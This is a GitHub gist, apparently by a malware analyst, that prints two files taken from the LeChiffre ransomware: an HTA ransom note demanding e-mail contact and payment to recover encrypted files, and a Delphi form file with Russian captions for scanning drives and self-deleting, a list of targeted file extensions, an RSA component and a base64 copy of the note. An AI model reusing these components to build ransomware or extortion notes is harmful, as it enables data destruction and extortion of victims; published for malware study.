Skip to content

Instantly share code, notes, and snippets.

@hasherezade

hasherezade/Attention_template.html Secret

Last active January 19, 2016 21:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hasherezade/4c6c230c0e1def8aefad to your computer and use it in GitHub Desktop.
Save hasherezade/4c6c230c0e1def8aefad to your computer and use it in GitHub Desktop.
Download ZIP
LeChiffre - TForm2.dfm
Raw
Attention_template.html
<!-- saved from url=(0014)about:internet -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Attention!</title>
<hta:application id="oHTA" applicationname="roubsheek" borderstyle="normal" innerborder="no" caption="yes" maximizebutton="yes" minimizebutton="no" showintaskbar="no" singleinstance="yes" version="1.0" contextmenu="no" scroll="yes" selection="no" windowstate="normal">
<style type="text/css">
</style>
</head>
<body style=" background-color: rgb(11, 31, 53); margin: 0 auto; ">
<div style=" font-family: arial; padding: 20px; ">
<div style=" font-size: 30px; color: wheat; text-align: center; height: 30px; padding-top: 3px; ">
Attention!
</div>
<div style=" font-size: 14px; font-family: arial; color: wheat;
margin: 0 auto; ">
<p>
Your important files (photos, videos, documents, archives, databases, backups, etc.) which were crypted with the strongest military cipher RSA1024 and AES. No one can`t help you to restore files without our decoder. Photorec, RannohDecryptor, etc repair tools are useless and can destroy your files irreversibly. If you want to restore files - send e-mail to <a style="color: rgb(253, 253, 253);" href="mailto:%mail%?subject=%subject%&amp;body=Secret code: %secret_code%" id="mail">%mail%</a></li>
with the file "_secret_code.txt" and 1-2 encrypted files less than 5 MB as *.doc *.xls *.jpg, but not database (*.900 *.001 etc). Please use public mail yahoo or gmail.
</p>
<p>
You will receive decrypted samples and our conditions how you`ll get the decoder. Follow the instructions to send payment.
</p>
<p>
P.S. Remember, we are not scammers. We don`t need your files. If you want, you can get a decryptor for free after 6 month. Just send a request immediately after infection. All data will be restored absolutelly. Your warranty - decrypted samples.
</p>
<p>
Secret code:
<div>
<span>
<input onclick="this.select();" value="%secret_code%" title="Copy: CTRL+C" style=" width: 100%; background-color: rgb(11, 31, 53); /* margin: 0 auto; */ padding-left: 10px; color: rgb(242, 227, 199); border: 1px solid #d3d3d3; ">
</span>
</div>
</p>
</div>
</div>
</body>
</html>
Raw
TForm2.dfm
object Form2: TForm2
Left = 320
Top = 181
ClientHeight = 466
ClientWidth = 433
Color = clBtnFace
Font.Charset = DEFAULT_CHARSET
Font.Color = clWindowText
Font.Height = -11
Font.Name = 'Tahoma'
Font.Style = []
OldCreateOrder = False
Position = poDesktopCenter
ShowHint = True
OnClose = FormClose
OnCreate = FormCreate
PixelsPerInch = 96
TextHeight = 13
object AttLbl: TLabel
AlignWithMargins = True
Left = 284
Top = 250
Width = 6
Height = 13
Caption = '0'
Transparent = True
end
object Label5: TLabel
AlignWithMargins = True
Left = 3
Top = 3
Width = 427
Height = 13
Align = alTop
Caption = #1057#1082#1072#1085#1080#1088#1091#1077#1084' '#1096#1072#1088#1099'...'
Transparent = True
ExplicitWidth = 98
end
object Label8: TLabel
AlignWithMargins = True
Left = 229
Top = 250
Width = 49
Height = 13
Caption = #1055#1086#1087#1099#1090#1086#1082':'
Transparent = True
end
object Label9: TLabel
AlignWithMargins = True
Left = 229
Top = 269
Width = 48
Height = 13
Caption = #1059#1089#1087#1077#1096#1085#1086':'
Transparent = True
end
object SucLbl: TLabel
AlignWithMargins = True
Left = 283
Top = 269
Width = 6
Height = 13
Caption = '0'
Transparent = True
end
object Label3: TLabel
AlignWithMargins = True
Left = 3
Top = 431
Width = 427
Height = 13
Cursor = crHandPoint
Hint = #1054#1090#1082#1088#1099#1090#1100' '#1087#1072#1087#1082#1091
Align = alBottom
Transparent = True
OnClick = Label3Click
ExplicitWidth = 3
end
object Label4: TLabel
AlignWithMargins = True
Left = 3
Top = 412
Width = 427
Height = 13
Align = alBottom
Transparent = True
ExplicitWidth = 3
end
object Label7: TLabel
AlignWithMargins = True
Left = 3
Top = 450
Width = 427
Height = 13
Align = alBottom
Caption = 'Label7'
Font.Charset = DEFAULT_CHARSET
Font.Color = clWindowText
Font.Height = -11
Font.Name = 'Tahoma'
Font.Style = [fsBold]
ParentFont = False
Transparent = True
ExplicitWidth = 37
end
object Label1: TLabel
Left = 229
Top = 325
Width = 71
Height = 13
Caption = #1050#1086#1084#1084#1077#1085#1090#1072#1088#1080#1081':'
end
object CheckBox2: TCheckBox
Left = 229
Top = 190
Width = 120
Height = 17
Align = alCustom
Caption = #1057#1072#1084#1086#1091#1076#1072#1083#1080#1090#1100#1089#1103
Checked = True
State = cbChecked
TabOrder = 0
end
object CheckBox3: TCheckBox
Left = 229
Top = 213
Width = 120
Height = 17
Align = alCustom
Caption = #1042#1099#1081#1090#1080' '#1080#1079' '#1089#1077#1072#1085#1089#1072
TabOrder = 1
end
object DiskList: TCheckListBox
Left = 8
Top = 22
Width = 215
Height = 381
Hint = #1044#1074#1086#1081#1085#1086#1081' '#1082#1083#1080#1082' '#1086#1090#1082#1088#1099#1074#1072#1077#1090' '#1088#1077#1089#1091#1088#1089
Align = alCustom
ItemHeight = 13
TabOrder = 2
OnDblClick = DiskListDblClick
end
object ExtList: TMemo
Left = 355
Top = 8
Width = 75
Height = 398
Align = alCustom
Lines.Strings = (
'*.*crypt'
'*.?db'
'*.001'
'*.1'
'*.1cd'
'*.2'
'*.7z'
'*.900'
'*.accdb'
'*.ai'
'*.bak'
'*.back'
'*.bk?'
'*.bk'
'*.bmp'
'*.cbf'
'*.cdr'
'*.cdx'
'*.cer'
'*.crt'
'*.cf'
'*.cfg'
'*.cr2'
'*.csv'
'*.dat'
'*.db?'
'*.dd'
'*.dmp'
'*.doc'
'*.docx'
'*.dt'
'*.efd'
'*.epf'
'*.eps'
'*.erf'
'*.ert'
'*.evt'
'*.ffdata'
'*.fxp'
'*.gbk'
'*.glf'
'*.gzip'
'*.i01'
'*.iar'
'*.img'
'*.iso'
'*.jpeg'
'*.jpg'
'*.key'
'*.lck'
'*.ldf'
'*.lgf'
'*.lic'
'*.license'
'*.mb'
'*.md?'
'*.mokesi'
'*.mxfd'
'*.mxl'
'*.odt'
'*.pbd'
'*.pdf'
'*.pf'
'*.pfx'
'*.png'
'*.ppt'
'*.psd'
'*.pst'
'*.rar'
'*.rpt'
'*.rtf'
'*.sql*'
'*.sdm'
'*.tar'
'*.tib'
'*.tif'
'*.tiff'
'*.xlk'
'*.xls'
'*.xml'
'*.xlsx'
'*.zip'
'*.zur'
'*backup*')
ScrollBars = ssVertical
TabOrder = 3
end
object HideButton: TButton
Left = 229
Top = 90
Width = 120
Height = 42
Align = alCustom
Caption = #1057#1082#1088#1099#1090#1100
TabOrder = 4
OnClick = HideButtonClick
end
object OneButton: TButton
Left = 229
Top = 138
Width = 120
Height = 42
Align = alCustom
Caption = #1054#1090#1076#1077#1083#1100#1085#1086
TabOrder = 5
OnClick = OneButtonClick
end
object PauseButton: TButton
Left = 229
Top = 66
Width = 120
Height = 18
Align = alCustom
Caption = #1053#1072#1095#1072#1090#1100' '#1073#1086#1083#1100#1096#1080#1077
TabOrder = 6
OnClick = PauseButtonClick
end
object StartButton: TButton
Left = 229
Top = 22
Width = 120
Height = 38
Align = alCustom
Caption = #1055#1091#1089#1082
TabOrder = 7
OnClick = StartButtonClick
end
object Memo1: TMemo
Left = 18
Top = 347
Width = 73
Height = 47
Align = alCustom
Lines.Strings = (
'PCEtLSBzYXZlZCBmcm9tIHVybD0oMDAxNClhYm91dDppbnRlcm5ldCAtLT4KPGh0' +
'bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRl' +
'bnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+Cjx0aXRsZT5BdHRlbnRpb24h' +
'PC90aXRsZT4KPGh0YTphcHBsaWNhdGlvbiBpZD0ib0hUQSIgYXBwbGljYXRpb25u' +
'YW1lPSJyb3Vic2hlZWsiIGJvcmRlcnN0eWxlPSJub3JtYWwiIGlubmVyYm9yZGVy' +
'PSJubyIgY2FwdGlvbj0ieWVzIiBtYXhpbWl6ZWJ1dHRvbj0ieWVzIiBtaW5pbWl6' +
'ZWJ1dHRvbj0ibm8iIHNob3dpbnRhc2tiYXI9Im5vIiBzaW5nbGVpbnN0YW5jZT0i' +
'eWVzIiB2ZXJzaW9uPSIxLjAiIGNvbnRleHRtZW51PSJubyIgc2Nyb2xsPSJ5ZXMi' +
'IHNlbGVjdGlvbj0ibm8iIHdpbmRvd3N0YXRlPSJub3JtYWwiPgo8c3R5bGUgdHlw' +
'ZT0idGV4dC9jc3MiPgo8L3N0eWxlPgo8L2hlYWQ+Cjxib2R5IHN0eWxlPSIgYmFj' +
'a2dyb3VuZC1jb2xvcjogcmdiKDExLCAzMSwgNTMpOyBtYXJnaW46IDAgYXV0bzsg' +
'Ij4KPGRpdiBzdHlsZT0iIGZvbnQtZmFtaWx5OiBhcmlhbDsgcGFkZGluZzogMjBw' +
'eDsgIj4KCTxkaXYgc3R5bGU9IiBmb250LXNpemU6IDMwcHg7IGNvbG9yOiB3aGVh' +
'dDsgdGV4dC1hbGlnbjogY2VudGVyOyBoZWlnaHQ6IDMwcHg7IHBhZGRpbmctdG9w' +
'OiAzcHg7ICI+CgkJIEF0dGVudGlvbiEKCTwvZGl2PgoJPGRpdiBzdHlsZT0iIGZv' +
'bnQtc2l6ZTogMTRweDsgZm9udC1mYW1pbHk6IGFyaWFsOyBjb2xvcjogd2hlYXQ7'
'IG1hcmdpbjogMCBhdXRvOyAiPgoJCTxwPgoJCQkgWW91ciBpbXBvcnRhbnQgZmls' +
'ZXMgKHBob3RvcywgdmlkZW9zLCBkb2N1bWVudHMsIGFyY2hpdmVzLCBkYXRhYmFz' +
'ZXMsIGJhY2t1cHMsIGV0Yy4pIHdoaWNoIHdlcmUgY3J5cHRlZCB3aXRoIHRoZSBz' +
'dHJvbmdlc3QgbWlsaXRhcnkgY2lwaGVyIFJTQTEwMjQgYW5kIEFFUy4gTm8gb25l' +
'IGNhbmB0IGhlbHAgeW91IHRvIHJlc3RvcmUgZmlsZXMgd2l0aG91dCBvdXIgZGVj' +
'b2Rlci4gUGhvdG9yZWMsIFJhbm5vaERlY3J5cHRvciwgZXRjIHJlcGFpciB0b29s' +
'cyBhcmUgdXNlbGVzcyBhbmQgY2FuIGRlc3Ryb3kgeW91ciBmaWxlcyBpcnJldmVy' +
'c2libHkuIElmIHlvdSB3YW50IHRvIHJlc3RvcmUgZmlsZXMgLSBzZW5kIGUtbWFp' +
'bCB0byA8YSBzdHlsZT0iY29sb3I6IHJnYigyNTMsIDI1MywgMjUzKTsiIGhyZWY9' +
'Im1haWx0bzolbWFpbCU/c3ViamVjdD0lc3ViamVjdCUmYW1wO2JvZHk9U2VjcmV0' +
'IGNvZGU6ICVzZWNyZXRfY29kZSUiIGlkPSJtYWlsIj4lbWFpbCU8L2E+PC9saT4K' +
'CQkJIHdpdGggdGhlIGZpbGUgIl9zZWNyZXRfY29kZS50eHQiIGFuZCAxLTIgZW5j' +
'cnlwdGVkIGZpbGVzIGxlc3MgdGhhbiA1IE1CIGFzICouZG9jICoueGxzICouanBn' +
'LCBidXQgbm90IGRhdGFiYXNlICgqLjkwMCAqLjAwMSBldGMpLiBQbGVhc2UgdXNl' +
'IHB1YmxpYyBtYWlsIHlhaG9vIG9yIGdtYWlsLgoJCTwvcD4KCQk8cD4KCQkJIFlv' +
'dSB3aWxsIHJlY2VpdmUgZGVjcnlwdGVkIHNhbXBsZXMgYW5kIG91ciBjb25kaXRp'
'b25zIGhvdyB5b3VgbGwgZ2V0IHRoZSBkZWNvZGVyLiBGb2xsb3cgdGhlIGluc3Ry' +
'dWN0aW9ucyB0byBzZW5kIHBheW1lbnQuCgkJPC9wPgoJCTxwPgoJCQkgUC5TLiBS' +
'ZW1lbWJlciwgd2UgYXJlIG5vdCBzY2FtbWVycy4gV2UgZG9uYHQgbmVlZCB5b3Vy' +
'IGZpbGVzLiBJZiB5b3Ugd2FudCwgeW91IGNhbiBnZXQgYSBkZWNyeXB0b3IgZm9y' +
'IGZyZWUgYWZ0ZXIgNiBtb250aC4gSnVzdCBzZW5kIGEgcmVxdWVzdCBpbW1lZGlh' +
'dGVseSBhZnRlciBpbmZlY3Rpb24uIEFsbCBkYXRhIHdpbGwgYmUgcmVzdG9yZWQg' +
'YWJzb2x1dGVsbHkuIFlvdXIgd2FycmFudHkgLSBkZWNyeXB0ZWQgc2FtcGxlcy4K' +
'CQk8L3A+CgkJPHA+CgkJCSBTZWNyZXQgY29kZToKCQkJPGRpdj4KCQkJCTxzcGFu' +
'PgoJCQkJPGlucHV0IG9uY2xpY2s9InRoaXMuc2VsZWN0KCk7IiB2YWx1ZT0iJXNl' +
'Y3JldF9jb2RlJSIgdGl0bGU9IkNvcHk6IENUUkwrQyIgc3R5bGU9IiB3aWR0aDog' +
'MTAwJTsgYmFja2dyb3VuZC1jb2xvcjogcmdiKDExLCAzMSwgNTMpOyAvKiBtYXJn' +
'aW46IDAgYXV0bzsgKi8gcGFkZGluZy1sZWZ0OiAxMHB4OyBjb2xvcjogcmdiKDI0' +
'MiwgMjI3LCAxOTkpOyBib3JkZXI6IDFweCBzb2xpZCAjZDNkM2QzOyAiPgoJCQkJ' +
'PC9zcGFuPgoJCQk8L2Rpdj4KCQk8L3A+Cgk8L2Rpdj4KPC9kaXY+CjwvYm9keT4K' +
'PC9odG1sPg==')
TabOrder = 8
Visible = False
WordWrap = False
end
object CommentEdit: TEdit
Left = 229
Top = 344
Width = 121
Height = 21
TabOrder = 9
end
object SaveComment: TButton
Left = 229
Top = 371
Width = 120
Height = 23
Align = alCustom
Caption = #1057#1086#1093#1088#1072#1085#1080#1090#1100
Enabled = False
TabOrder = 10
OnClick = SaveCommentClick
end
object GoCrypt: TTimer
Enabled = False
Interval = 100
Left = 16
Top = 32
end
object LbRSA1: TLbRSA
PrimeTestIterations = 20
KeySize = aks512
Left = 96
Top = 32
end
object Counts: TTimer
OnTimer = CountsTimer
Left = 304
Top = 248
end
object UpdateQuantity: TTimer
Enabled = False
Interval = 10000
OnTimer = UpdateQuantityTimer
Left = 16
Top = 88
end
object FileFinder: TFileFinder
ScanDirs = sdAllDrives
Wildcards.Strings = (
'*.*')
Attributes = [faArchive, faReadOnly, faHidden, faSystem, faCompressed, faTemporary]
MaxThreads = 1
OnFindFile = FileFinderFindFile
OnScanDirectory = FileFinderScanDirectory
OnEndScan = FileFinderEndScan
Left = 96
Top = 216
end
object OneDialog: TOpenDialog
Options = [ofHideReadOnly, ofAllowMultiSelect, ofEnableSizing]
Left = 192
Top = 152
end
object FileFinderBig: TFileFinder
ScanDirs = sdAllDrives
Wildcards.Strings = (
'*')
Attributes = [faArchive, faHidden, faCompressed, faTemporary]
MaxThreads = 1
OnFindFile = FileFinderBigFindFile
OnScanDirectory = FileFinderBigScanDirectory
OnEndScan = FileFinderBigEndScan
Left = 176
Top = 216
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment